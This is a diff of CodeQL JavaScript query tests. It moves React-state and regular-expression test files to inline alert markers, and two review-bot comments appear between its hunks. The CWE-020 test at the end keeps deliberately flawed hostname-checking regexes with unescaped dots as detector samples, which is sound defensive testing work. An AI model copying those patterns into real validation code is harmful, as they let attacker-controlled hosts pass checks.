extends React.Component { // $ Alert constructor() { - this.state.writtenThrougExternalPropertyAccess; // OK - this.state.notWrittenThrougExternalPropertyAccess; // NOT OK + this.state.writtenThrougExternalPropertyAccess; + this.state.notWrittenThrougExternalPropertyAccess; // $ RelatedLocation } } 
@@ -44,24 +44,24 @@ class C4 extends React.Component { return { writtenInUnknownInitializerObject: 42 }; } this.state = f(); - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } class C5 extends React.Component { constructor(x) { this.state = x; - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above } } new C5({writtenInUnknownInitializerObject: 42}); -React.createClass({ +React.createClass({ // $ Alert render: function() { - this.state.writtenInKnownInitializerObject; // OK - this.state.notWrittenInKnownInitializerObject; // NOT OK + this.state.writtenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ RelatedLocation return
    ; }, getInitialState: function() { @@ -74,8 +74,8 @@ React.createClass({ function f(){ return { writtenInUnknownInitializerObject: 42 }; } - this.state.writtenInUnknownInitializerObject; // OK - this.state.notWrittenInUnknownInitializerObject; // NOT OK, but ignored to avoid FP above + this.state.writtenInUnknownInitializerObject; + this.state.notWrittenInUnknownInitializerObject; // OK - ignored to avoid FP above return
    ; }, getInitialState: function() { @@ -86,8 +86,8 @@ React.createClass({ class C6 extends React.Component { constructor(x) { Object.assign(this.state, {writtenInObjectAssign: 42}); - this.state.writtenInObjectAssign; // OK - this.state.notWrittenInObjectAssign; // NOT OK, but ignored to avoid FP above + this.state.writtenInObjectAssign; + this.state.notWrittenInObjectAssign; // OK - ignored to avoid FP above } } @@ -96,8 +96,8 @@ class C6 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenSetState; // OK - this.state.notWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenSetState; + this.state.notWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -107,7 +107,7 @@ class C7 extends React.Component { function f(){ return { writtenInSetState: 42 }; } - this.state.writtenInSetState; // OK + this.state.writtenInSetState; this.setState(f); } } @@ -120,8 +120,8 @@ class C8 extends React.Component { function g() { return { writtenInSetState: 42 } } - this.state.writtenInSetState; // OK - this.state.notInWrittenSetState; // NOT OK, but ignored to avoid FP above + this.state.writtenInSetState; + this.state.notInWrittenSetState; // OK - ignored to avoid FP above this.setState(f()); } } @@ -131,8 +131,8 @@ class C9 extends React.Component { function f() { return "readThroughUnknownDynamicPropertyAccess"; } this.state[f()] = 42; - this.state.writtenThroughUnknownDynamicPropertyAccess; // OK - this.state.notWrittenThroughUnknownDynamicPropertyAccess; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownDynamicPropertyAccess; + this.state.notWrittenThroughUnknownDynamicPropertyAccess; // OK - ignored to avoid FP above } } 
@@ -141,15 +141,15 @@ class C10 extends React.Component { constructor() { var x = { writtenThroughUnknownSpreadAccess: 42 }; this.state = { ...x }; - this.state.writtenThroughUnknownSpreadAccess; // OK - this.state.notWrittenThroughUnknownSpreadAccess// NOT OK, but ignored to avoid FP above + this.state.writtenThroughUnknownSpreadAccess; + this.state.notWrittenThroughUnknownSpreadAccess// OK - ignored to avoid FP above } } React.createClass({ render: function() { - this.state.writtenThroughMixin; // OK - this.state.notWrittenThroughMixin; // NOT OK, but ignored to avoid FP above + this.state.writtenThroughMixin; + this.state.notWrittenThroughMixin; // OK - ignored to avoid FP above return

    Hello

    ; }, @@ -163,6 +163,6 @@ class C11 extends React.Component { } otherMethod() { - this.state.writeIn_getDerivedStateFromProps; // OK + this.state.writeIn_getDerivedStateFromProps; } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d71aa7136da9..60673a23b620 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { - this.state.readDirectly = 42; // OK - this.state.readInChain = {}; // OK - this.state.readInOtherMethod = {}; // OK - this.state.notRead = 42; // NOT OK + this.state.readDirectly = 42; + this.state.readInChain = {}; + this.state.readInOtherMethod = {}; + this.state.notRead = 42; // $ RelatedLocation this.state.readDirectly; this.state.readInChain.foo; } @@ -18,16 +18,16 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // NOT OK + this.state.readWhenEscaped = 42; f(this.state); } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { - this.state.readThrougExternaPropertyAccess = 42; // OK - this.state.notReadThrougExternaPropertyAccess = 42; // NOT OK + this.state.readThrougExternaPropertyAccess = 42; + this.state.notReadThrougExternaPropertyAccess = 42; // $ RelatedLocation } } 
@@ -36,8 +36,8 @@ new C3().state.readThrougExternaPropertyAccess; class C4 extends React.Component { constructor() { function f() { return "readThroughUnknownDynamicPropertyAccess"; } - this.state.readThroughUnknownDynamicPropertyAccess = 42; // OK - this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughUnknownDynamicPropertyAccess = 42; + this.state.notReadThroughUnknownDynamicPropertyAccess = 42; // $ OK - ignored to avoid FP above this.state[f()]; } @@ -46,15 +46,15 @@ class C4 extends React.Component { class C5 extends React.Component { constructor() { - this.state.readThroughSpreadOperator = 42; // OK + this.state.readThroughSpreadOperator = 42; ({...this.state}); } } React.createClass({ render: function() { - this.state.readThroughMixin = 42; // OK - this.state.notReadThroughMixin = 42; // NOT OK, but ignored to avoid FP above + this.state.readThroughMixin = 42; + this.state.notReadThroughMixin = 42; // $ OK - ignored to avoid FP above return
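Review bot: The `// $ OK - ignored to avoid FP above` comments added in `unused.js` (class `C4` in hunk `@@ -36,8 +36,8 @@`, and the `React.createClass` case in hunk `@@ -46,15 +46,15 @@`) begin with the `$` expectation marker, while the same remark in the earlier hunk `@@ -141,15 +141,15 @@` is written as plain `// OK - ignored to avoid FP above`. A comment starting with `$` is read by the inline-expectations parser as an expectation rather than as prose. How an `OK` tag is treated is not visible on this page, so it is worth checking that it does not produce a spurious or silently ignored expectation. Writing `// OK - ignored to avoid FP above` in both files keeps explanatory text out of the expectation syntax.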

    Hello

    ; }, @@ -68,7 +68,7 @@ class C6 extends React.Component { } constructor() { - this.state.readIn_getDerivedStateFromProps = 42; // OK + this.state.readIn_getDerivedStateFromProps = 42; } } diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref index 3c5f29d2f914..0096b5fd9e9c 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/BackrefBeforeGroup.qlref @@ -1 +1,2 @@ -RegExp/BackrefBeforeGroup.ql \ No newline at end of file +query: RegExp/BackrefBeforeGroup.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js index 2ac332dfb38d..83fd7871d4ed 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefBeforeGroup/tst.js @@ -1,9 +1,9 @@ -/\1(abc)/; // NOT OK -/(a\1c)/; // NOT OK -/(ab)\2(c)/; // NOT OK -/(?:ab)\1(c)/; // NOT OK +/\1(abc)/; // $ Alert +/(a\1c)/; // $ Alert +/(ab)\2(c)/; // $ Alert +/(?:ab)\1(c)/; // $ Alert /(abc)\1/; /]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/; -/\k(?\w+)/; // NOT OK -/(?<=\1(.))a/; // OK -/(?<=(.)\1)a/; // NOT OK, but not currently flagged +/\k(?\w+)/; // $ Alert +/(?<=\1(.))a/; +/(?<=(.)\1)a/; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected index 2210f9711682..52d3597bb637 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected 
+++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected @@ -1 +1 @@ -| tst.js:4:17:4:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:4:11:4:14 | (a+) | this capture group | tst.js:4:8:4:16 | (?!(a+)b) | negative lookahead assertion | +| tst.js:3:17:3:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:3:11:3:14 | (a+) | this capture group | tst.js:3:8:3:16 | (?!(a+)b) | negative lookahead assertion | diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref index a9ba2975bb7c..181646694e12 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref @@ -1 +1,2 @@ -RegExp/BackrefIntoNegativeLookahead.ql +query: RegExp/BackrefIntoNegativeLookahead.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js index b2199e311374..7cf1ff3629b5 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js @@ -1,4 +1,3 @@ -// OK + /(.*?)a(?!(a+)b\2)/; -// NOT OK -/(.*?)a(?!(a+)b)\2(.*)/; +/(.*?)a(?!(a+)b)\2(.*)/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref index 1d1f9bbe756e..17bb483eba24 100644 
--- a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref @@ -1 +1,2 @@ -RegExp/BackspaceEscape.ql \ No newline at end of file +query: RegExp/BackspaceEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js index 7796e660bbaa..1fd49f807e75 100644 --- a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js @@ -1,4 +1,4 @@ /\bx\b/; -/[\b]x/; +/[\b]x/; // $ Alert /[\ch]x[\cH]/; /\ch\ch/; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref index 790af75f6e4a..a04b25019d43 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref @@ -1 +1,2 @@ -RegExp/DuplicateCharacterInCharacterClass.ql \ No newline at end of file +query: RegExp/DuplicateCharacterInCharacterClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js index 82c0ebcd566d..c87c7140a16c 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js 
@@ -1,14 +1,14 @@ -/[foo]/; +/[foo]/; // $ Alert /[a-zc]/; /[\uDC3A\uDC3C]/; -/[??]/; -/[\u003F\u003f]/; -/[\u003F?]/; -/[\x3f\u003f]/; -/[aaa]/; -/[\x0a\x0a]/; -/[\u000a\n]/; +/[??]/; // $ Alert +/[\u003F\u003f]/; // $ Alert +/[\u003F?]/; // $ Alert +/[\x3f\u003f]/; // $ Alert +/[aaa]/; // $ Alert +/[\x0a\x0a]/; // $ Alert +/[\u000a\n]/; // $ Alert /[\u{ff}]/; -/[\u{12340}-\u{12345}]/u; // OK -new RegExp("[\u{12340}-\u{12345}]", "u"); // OK +/[\u{12340}-\u{12345}]/u; +new RegExp("[\u{12340}-\u{12345}]", "u"); const regex = /\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv; diff --git a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref index 55f7a866513d..d6c8edc76cad 100644 --- a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref +++ b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref @@ -1 +1,2 @@ -RegExp/EmptyCharacterClass.ql \ No newline at end of file +query: RegExp/EmptyCharacterClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js index d234847bbe54..b685d92d94f8 100644 --- a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js @@ -1,2 +1,2 @@ -/[]/; +/[]/; // $ Alert /[^]/; diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js index 7591d00c4411..18e9a4328d90 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js 
+++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js @@ -1,5 +1,5 @@ -var escaped = raw.replace(/"/g, '\"'); +var escaped = raw.replace(/"/g, '\"'); // $ Alert (function() { var indirect = /"/g; - raw.replace(indirect, '\"'); + raw.replace(indirect, '\"'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref index f8b9c39b11ff..97214a93be45 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref @@ -1 +1,2 @@ -RegExp/IdentityReplacement.ql \ No newline at end of file +query: RegExp/IdentityReplacement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js index 33325224dbbe..091c8049f193 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js @@ -1,16 +1,16 @@ -raw.replace("\\", "\\"); // NOT OK -raw.replace(/(\\)/, "\\"); // NOT OK -raw.replace(/["]/, "\""); // NOT OK -raw.replace("\\", "\\\\"); // OK +raw.replace("\\", "\\"); // $ Alert +raw.replace(/(\\)/, "\\"); // $ Alert +raw.replace(/["]/, "\""); // $ Alert +raw.replace("\\", "\\\\"); -raw.replace(/foo/g, 'foo'); // NOT OK -raw.replace(/foo/gi, 'foo'); // OK +raw.replace(/foo/g, 'foo'); // $ Alert +raw.replace(/foo/gi, 'foo'); -raw.replace(/^\\/, "\\"); // NOT OK -raw.replace(/\\$/, "\\"); // NOT OK -raw.replace(/\b\\/, "\\"); // NOT OK -raw.replace(/\B\\/, "\\"); // NOT OK -raw.replace(/\\(?!\\)/, "\\"); // NOT OK -raw.replace(/(?/g, "foo"); + return a.replace(/<\!--(?!{cke_protected})[\s\S]+?--\>/g, "foo"); // $ Alert } /\u{ff}/ 
diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref index acdde814bbcb..a65bb3ab3512 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref @@ -1 +1,2 @@ -RegExp/RegExpAlwaysMatches.ql \ No newline at end of file +query: RegExp/RegExpAlwaysMatches.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js index b4c54be9b8a6..e46442da3432 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js @@ -1,37 +1,37 @@ function optionalPrefix(x) { - return /^(https:)?/.test(x); // NOT OK + return /^(https:)?/.test(x); // $ Alert } function mandatoryPrefix(x) { - return /^https:/.test(x); // OK + return /^https:/.test(x); } function httpOrHttps(x) { - return /^https?:/.test(x); // OK + return /^https?:/.test(x); } function optionalSuffix(x) { - return /(\.com)?$/.test(x); // NOT OK + return /(\.com)?$/.test(x); // $ Alert } function mandatorySuffix(x) { - return /\.com$/.test(x); // OK + return /\.com$/.test(x); } function protocol(x) { - return /^(?:https?:|ftp:|file:)?/.test(x); // NOT OK + return /^(?:https?:|ftp:|file:)?/.test(x); // $ Alert } function doubleAnchored(x) { - return /^(foo|bar)?$/.test(x); // OK + return /^(foo|bar)?$/.test(x); } function noAnchor(x) { - return /(foo|bar)?/.test(x); // NOT OK + return /(foo|bar)?/.test(x); // $ Alert } function altAnchor(x) { - return /^foo|bar$|(baz)?/.test(x); // NOT OK + return /^foo|bar$|(baz)?/.test(x); // $ Alert } function wildcard(x) { 
@@ -43,31 +43,31 @@ function wildcard2(x) { } function emptyAlt(x) { - return /^$|foo|bar/.test(x); // OK + return /^$|foo|bar/.test(x); } function emptyAlt2(x) { - return /(^$|foo|bar)/.test(x); // OK + return /(^$|foo|bar)/.test(x); } function emptyAlt3(x) { - return /((^$|foo|bar))/.test(x); // OK + return /((^$|foo|bar))/.test(x); } function search(x) { - return x.search(/[a-z]*/) > -1; // NOT OK + return x.search(/[a-z]*/) > -1; // $ Alert } function search2(x) { - return x.search(/[a-z]/) > -1; // OK + return x.search(/[a-z]/) > -1; } function lookahead(x) { - return x.search(/(?!x)/) > -1; // OK + return x.search(/(?!x)/) > -1; } function searchPrefix(x) { - return x.search(/^(foo)?/) > -1; // NOT OK - `foo?` does not affect the returned index + return x.search(/^(foo)?/) > -1; // $ Alert - `foo?` does not affect the returned index } function searchSuffix(x) { @@ -83,10 +83,10 @@ function nonWordBoundary(x) { } function emptyRegex(x) { - return new RegExp("").test(x); // OK + return new RegExp("").test(x); } function parserTest(x) { - /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); // OK - /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); // ok + /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); + /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); } diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected index d2acad5b7659..69c471955218 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected 
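Review bot: In `parserTest` (hunk `@@ -83,10 +83,10 @@` of `RegExpAlwaysMatches/tst.js`), the second statement calls `.text(x)`, which looks like a typo for `.test(x)`; the commit strips the `// ok` comment but keeps the call as is. If the query only considers regular expressions used through matching calls such as `test` or `search`, as the other cases in this file suggest, the no-alert expectation on that line holds regardless of the pattern, and the line does not exercise what it is meant to. Suggested: `/^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.test(x);`.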
@@ -1,4 +1,4 @@ -| tst.js:4:2:4:3 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:8:13:8:14 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:15:16:15:17 | \\2 | There is no capture group 2 in this regular expression. | -| tst.js:16:16:16:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | +| tst.js:3:2:3:3 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:6:13:6:14 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:12:16:12:17 | \\2 | There is no capture group 2 in this regular expression. | +| tst.js:13:16:13:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref index bbcc8421a409..c653d8604aa9 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref @@ -1 +1,2 @@ -RegExp/UnboundBackref.ql \ No newline at end of file +query: RegExp/UnboundBackref.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js index 9c5481469151..df5b4144172e 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js @@ -1,16 +1,13 @@ -// OK + /\0/; -// NOT OK -/\1/; -// OK +/\1/; // $ Alert + /^(\s+)\w+\1$/; -// NOT OK -/^(?:\s+)\w+\1$/; -// OK +/^(?:\s+)\w+\1$/; // $ Alert + /[\1]/; -// OK + /^(?\s+)\w+\1$/; /^(?\s+)\w+\k$/; -// NOT OK -/^(?\s+)\w+\2$/; -/^(?\s+)\w+\k$/; +/^(?\s+)\w+\2$/; // $ Alert +/^(?\s+)\w+\k$/; // $ Alert 
diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected index 2b0eaa5e3a03..d9382b86a625 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected @@ -1,3 +1,3 @@ -| tst.js:2:4:2:4 | ^ | This assertion can never match. | -| tst.js:11:5:11:5 | ^ | This assertion can never match. | -| tst.js:20:5:20:5 | ^ | This assertion can never match. | +| tst.js:1:4:1:4 | ^ | This assertion can never match. | +| tst.js:9:5:9:5 | ^ | This assertion can never match. | +| tst.js:16:5:16:5 | ^ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref index 13297fa2c9be..ee3a5c95eebf 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref @@ -1 +1,2 @@ -RegExp/UnmatchableCaret.ql \ No newline at end of file +query: RegExp/UnmatchableCaret.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js index 50d70094dd64..b35bd4172385 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js 
@@ -1,32 +1,28 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /(a|^b)c/; -// OK + /a*(^b|c)/; -// NOT OK -/a\n^b/; +/a\n^b/; // $ Alert + -// OK /a\n^b/m; -// NOT OK, but not recognised -/a\\n^b/m; +/a\\n^b/m; // $ MISSING: Alert + +/ab*^c/; // $ Alert -// NOT OK -/ab*^c/; -// OK /^^abc/; -// OK + /^(^y|^z)(u$|v$)$/; -// OK + /x*^y/; -// OK + /(?<=(^|\/)(\.|\.\.))$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected index 6e57f22c18a7..a380a81c2744 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected @@ -1,4 +1,4 @@ -| tst.js:2:10:2:10 | $ | This assertion can never match. | -| tst.js:11:3:11:3 | $ | This assertion can never match. | -| tst.js:20:3:20:3 | $ | This assertion can never match. | -| tst.js:38:6:38:6 | $ | This assertion can never match. | +| tst.js:1:10:1:10 | $ | This assertion can never match. | +| tst.js:9:3:9:3 | $ | This assertion can never match. | +| tst.js:16:3:16:3 | $ | This assertion can never match. | +| tst.js:33:6:33:6 | $ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref index f6798fd1ffa1..c79d650f18e1 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref @@ -1 +1,2 @@ -RegExp/UnmatchableDollar.ql \ No newline at end of file +query: RegExp/UnmatchableDollar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js index 95708b3cd0ed..86da692cea84 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js @@ -1,38 +1,33 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /a(b$|c)/; -// OK + /(a|b$)c*/; -// NOT OK -/a$\nb/; +/a$\nb/; // $ Alert + -// OK /a$\nb/m; -// NOT OK, but not recognised -/a$\\nb/m; +/a$\\nb/m; // $ MISSING: Alert + +/a$b*c/; // $ Alert -// NOT OK -/a$b*c/; -// OK /^(^y|^z)(u$|v$)$/; -// OK + /.*x$$$/; -// OK + /x$y*/; -// OK + /x(?!y+$).*y.*/; -// OK + /x(?=[yz]+$).*yz.*/; -// NOT OK -/(?<=$x)yz/; +/(?<=$x)yz/; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js index 320175ab1d42..ae0447f132fd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js @@ -44,7 +44,7 @@ /^https:\/\/[a-z]*.example.com$/; // $ Alert RegExp('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); // $ Alert - /^(example.dev|example.com)/; // OK + /^(example.dev|example.com)/; new RegExp('^http://localhost:8000|' + '^https?://.+.example\\.com/'); // $ Alert 
